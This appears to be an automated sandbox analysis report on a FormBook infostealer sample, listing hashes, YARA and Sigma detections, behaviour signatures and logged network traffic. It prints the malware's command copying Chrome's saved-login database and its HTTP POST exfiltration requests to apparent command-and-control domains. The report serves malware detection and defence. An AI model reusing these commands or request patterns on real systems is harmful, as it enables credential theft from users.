### Loading ...

Play interactive tourEdit tour

# Analysis Report xg28sL5JDm.exe

## Overview

### General Information

 Sample Name: xg28sL5JDm.exe MD5: 427c74cd09c5e3da8c9c9f3d5c1c126a SHA1: 59583b1abf57a9d1d01de013d864ec3c75d68938 SHA256: e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x7248:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x74b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x12ae5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x125d1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x12be7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x12d5f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x802a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1184c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x89c3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17e37:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x18e3a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries
SourceRuleDescriptionAuthorStrings
3.2.xg28sL5JDm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
3.2.xg28sL5JDm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x14949:\$sqlite3step: 68 34 1C 7B E1
• 0x14a5c:\$sqlite3step: 68 34 1C 7B E1
• 0x14978:\$sqlite3text: 68 38 2A 90 C5
• 0x14a9d:\$sqlite3text: 68 38 2A 90 C5
• 0x1498b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x14ab3:\$sqlite3blob: 68 53 D8 7F 8C
3.2.xg28sL5JDm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x6448:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x66b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x11ce5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x117d1:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x11de7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x11f5f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x722a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x10a4c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x7bc3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17037:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1803a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.1.sdv88p2lg.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
15.1.sdv88p2lg.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x15749:\$sqlite3step: 68 34 1C 7B E1
• 0x1585c:\$sqlite3step: 68 34 1C 7B E1
• 0x15778:\$sqlite3text: 68 38 2A 90 C5
• 0x1589d:\$sqlite3text: 68 38 2A 90 C5
• 0x1578b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x158b3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 43 entries

## Sigma Overview

### System Summary:

 Sigma detected: Steal Google chrome login data Show sources
 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5972, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3252
 Sigma detected: Suspicious Svchost Process Show sources
 Source: Process started Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972
 Sigma detected: Windows Processes Suspicious Parent Directory Show sources
 Source: Process started Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972

## Signature Overview

Click to jump to signature section

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: xg28sL5JDm.exe Avira: detected
 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Avira: detection malicious, Label: HEUR/AGEN.1046743
 Multi AV Scanner detection for domain / URL Show sources
 Source: www.allixanes.com Virustotal: Detection: 6% Perma Link Source: http://www.allixanes.com/ez3/ Virustotal: Detection: 11% Perma Link Source: http://www.allixanes.com Virustotal: Detection: 6% Perma Link Source: http://www.tylermercer.net/ez3/ Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Virustotal: Detection: 81% Perma Link Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe Metadefender: Detection: 28% Perma Link Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe ReversingLabs: Detection: 90%
 Multi AV Scanner detection for submitted file Show sources
 Source: xg28sL5JDm.exe Virustotal: Detection: 81% Perma Link Source: xg28sL5JDm.exe Metadefender: Detection: 28% Perma Link Source: xg28sL5JDm.exe ReversingLabs: Detection: 90%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 15.1.sdv88p2lg.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 3.2.xg28sL5JDm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 3.1.xg28sL5JDm.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 15.2.sdv88p2lg.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 14.2.sdv88p2lg.exe.2270000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 5.2.svchost.exe.2d00000.2.unpack Avira: Label: TR/Patched.Ren.Gen Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 14.2.sdv88p2lg.exe.2600000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 0_2_004051BC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004051BC

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov ebx, 000014B9h 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then push 00000000h 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov eax, dword ptr [00475BF0h] 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov dl, byte ptr [eax+0046BF64h] 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then inc ebx 0_2_00469CD0 Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then mov eax, dword ptr [esp] 0_2_00469C6C Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 4x nop then pop edi 3_2_0040BB4B Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 5_2_0040BB4B Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then mov eax, dword ptr [esi+34h] 14_2_022B4705 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then jmp 022B5F22h 14_2_022B5766 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then add edx, 02h 14_2_022B7243 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then mov dword ptr [ebp+10h], ebx 14_2_022B3ED1 Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 4x nop then call dword ptr [edi+000000F4h] 14_2_022B282D Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 18_2_007ABB4B

### Networking:

 Tries to resolve many domain names, but no domain seems valid Show sources
 Source: unknown DNS traffic detected: query: www.tinbaofb.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.tatilultra.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.tqg6k4jl-0k8rlg.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.greenslandscapingllc.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.estereojerusalenfm.com replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.zqhanu.men replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.chestermerecalgaryhomes.info replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.oraning.net replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.hoops2life.net replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.vxstfh.men replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.jwc.bet replaycode: Name error (3) Source: unknown DNS traffic detected: query: www.djhong.net replaycode: Name error (3)
 Domain name seen in connection with other malware Show sources
 Source: Joe Sandbox View Domain Name: www.allixanes.com www.allixanes.com
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 198.185.159.144 198.185.159.144 Source: Joe Sandbox View IP Address: 198.185.159.144 198.185.159.144
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.tylermercer.netConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.tylermercer.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tylermercer.net/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 7a 67 49 71 67 45 4f 44 70 63 53 76 64 57 64 32 61 6e 6b 58 59 48 66 47 62 2d 6b 7a 53 59 46 34 42 6f 64 6b 36 69 56 47 68 4d 45 48 72 6e 4d 6f 34 77 36 4e 58 68 43 52 43 70 7a 41 64 44 37 30 59 6c 4a 36 30 32 30 32 51 55 38 5a 38 35 69 51 32 68 36 77 5a 6f 52 71 30 34 70 31 57 50 44 58 79 53 51 49 41 4b 53 7a 65 43 35 57 7a 6b 66 78 72 72 4c 48 64 31 65 35 44 68 6b 5f 35 58 55 47 28 4d 57 65 63 50 53 47 4b 43 64 49 57 6b 6a 66 6c 4b 54 48 4b 30 37 4e 34 42 49 6b 55 54 66 75 6a 43 6c 72 42 50 4e 67 66 73 77 6c 4c 57 4c 2d 62 30 6d 6a 55 47 66 64 50 59 41 41 51 45 35 48 67 32 46 63 78 77 28 54 61 6b 44 75 6f 65 6b 48 64 31 35 63 55 4e 47 79 53 4e 62 5f 46 5a 55 66 6b 6c 73 31 61 2d 51 6a 58 41 63 31 48 78 56 33 55 6c 49 48 70 38 49 74 6c 47 76 44 77 33 75 5a 44 4b 69 56 56 58 46 71 4e 6d 6c 38 6b 67 6e 77 77 4d 69 76 4f 53 34 4a 6a 56 4c 63 45 57 72 39 72 62 4e 41 47 5a 79 77 76 5a 49 63 76 65 42 31 59 58 50 74 43 51 43 71 43 73 65 52 37 58 6a 61 34 58 70 44 56 68 39 51 37 56 76 42 6c 38 79 73 31 70 47 55 32 70 38 34 7e 57 72 41 70 64 51 6b 6b 64 41 69 76 65 4e 5a 30 30 41 6c 4b 7a 77 37 5a 6a 45 53 52 79 31 5a 37 31 63 69 79 51 4c 4e 58 78 45 75 56 5a 6e 58 61 45 74 38 51 39 35 33 73 45 74 37 4f 48 32 4d 53 4a 44 34 4b 68 56 33 6d 66 37 35 68 78 48 56 48 6a 61 38 62 49 6e 56 39 4f 54 72 6d 72 71 75 47 6f 41 33 4a 46 38 2d 50 6b 76 67 75 6e 33 77 55 79 6b 67 78 36 63 69 63 6f 67 31 52 44 4d 30 49 4c 55 7a 36 64 4e 7a 58 4c 38 4f 6a 70 74 4c 72 48 4a 32 49 58 6c 46 46 63 74 35 6e 6d 4f 64 31 67 65 46 69 4e 41 36 63 61 62 76 63 66 69 2d 42 2d 66 41 4a 68 4d 68 6c 32 6b 58 35 53 41 78 6a 5f 77 38 41 63 55 36 62 46 73 74 74 47 30 42 37 50 79 7a 71 33 70 47 36 4d 44 35 74 46 72 45 67 65 72 51 47 58 31 49 33 32 6b 41 51 49 67 6f 36 76 66 6e 42 4a 4e 46 59 78 58 44 74 34 6f 48 34 78 38 38 75 5f 48 71 43 6f 4e 79 28 76 30 6a 57 7a 74 45 47 7a 6a 35 74 6d 47 65 76 59 63 5a 4c 69 39 37 59 76 6d 38 4c 6a 35 74 73 5f 54 47 44 56 76 52 68 54 57 58 7a 63 77 68 30 57 52 6a 4e 31 4a 4f 38 5a 6a 52 28 70 53 63 6b 5f 49 5a 78 35 73 41 34 76 33 4a 36 51 56 44 35 65 65 54 63 64 64 42 59 55 6f 37 73 39 70 68 78 46 4e 55 47 33 46 34 63 48 68 54 6e 6b 48 6c 49 5f 66 69 6b 72 70 4f 36 47 52 7a 74 61 7a 35 28 7a 73 63 41 7a 61 65 31 47 4c 4b 63 43 73 6d 41 66 57 33 48 5f 51 48 74 37 64 4c 50 47 32 58 4b 52 74 55 4a 5a 39 47 6c 58 35 57 6c 54 5a 32 4c 41 46 42 47 56 47 48 69 38 45 6d 49 75 46 2d 66 70 61 4f 51 2d 4f 36 4c 55 61 6a 52 51 54 48 7e 48 57 68 4a 37 6e 43 4e 56 37 4a 61 63 51 39 42 6c 7a 53 6e 6e 4c 6f 49 31 78 5f 45 4a 6f 68 43 44 61 32 4b 53 78 5 Source: global traffic HTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 66 56 69 4e 52 56 4f 73 32 59 42 32 6e 50 67 2d 72 4c 49 4d 70 4f 62 74 70 6a 6c 61 47 33 57 4e 30 45 42 70 50 52 4d 63 72 77 75 75 4b 70 48 33 7a 31 6b 30 43 45 36 76 66 55 75 4b 34 38 46 78 72 6f 53 72 49 44 70 53 77 6f 58 71 36 5f 6b 5a 69 69 73 44 4e 64 61 41 62 36 66 64 28 4d 4a 50 4a 55 70 57 64 2d 4e 54 54 41 4e 2d 30 64 38 69 6f 55 41 75 32 4e 77 58 57 34 47 67 7a 44 56 41 4a 49 57 49 6a 64 77 39 77 62 49 79 34 66 48 76 77 2d 28 41 41 77 79 75 73 33 54 69 37 35 65 46 58 5f 71 59 52 47 47 4f 55 73 6e 45 7a 62 30 53 38 62 69 52 31 4b 6b 2d 44 53 38 39 4a 49 6a 65 28 64 51 38 33 6d 70 50 49 37 58 70 68 63 54 38 64 69 33 64 4f 